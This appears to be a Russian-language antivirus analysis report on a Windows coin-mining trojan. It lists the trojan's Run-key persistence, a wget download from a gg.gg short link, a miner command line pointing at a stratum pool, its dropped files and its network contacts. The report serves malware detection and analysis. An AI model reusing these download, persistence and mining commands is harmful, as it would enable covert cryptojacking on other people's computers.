Техническая информация
Автозапуск (ключ реестра Run):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AtiHotKey' = 'C:\miner\ati.vbs'
Командные строки процессов:
- 'C:\miner\wget.exe' http://gg.gg/0805
- 'C:\miner\32\nvidia.exe' -o stratum+tcp://37.59.31.34:3333 -u boxed.u -p x --algo scrypt -q -t 2
- '<SYSTEM32>\wscript.exe' "C:\miner\ati.vbs"
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AtiHotKey" /t REG_SZ /d "C:\miner\ati.vbs"
- '<SYSTEM32>\cmd.exe' /c ""C:\miner\1.bat" "
Файлы в каталоге C:\miner:
- C:\miner\32\pthreadGC2.dll
- C:\miner\64\pthreadGC2.dll
- C:\miner\64\libcurl-4.dll
- C:\miner\0805
- C:\miner\ati.vbs
- C:\miner\32\zlib1.dll
- C:\miner\32\libcurl-4.dll
- C:\miner\32\nircmd.exe
- C:\miner\32\start.bat
- C:\miner\1.bat
- C:\miner\wget.exe
- C:\miner\64\nvidia.exe
- C:\miner\32\nvidia.exe
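Сетевая активность:
- 'gg.gg':80
- '37.#9.31.34':3333 (один символ адреса заменён на «#»; порт и остальные октеты совпадают с адресом stratum-пула 37.59.31.34:3333 из командной строки nvidia.exe)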
- gg.gg/0805
- DNS ASK gg.gg
Окна (имя класса / заголовок):
- ClassName: 'Indicator' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'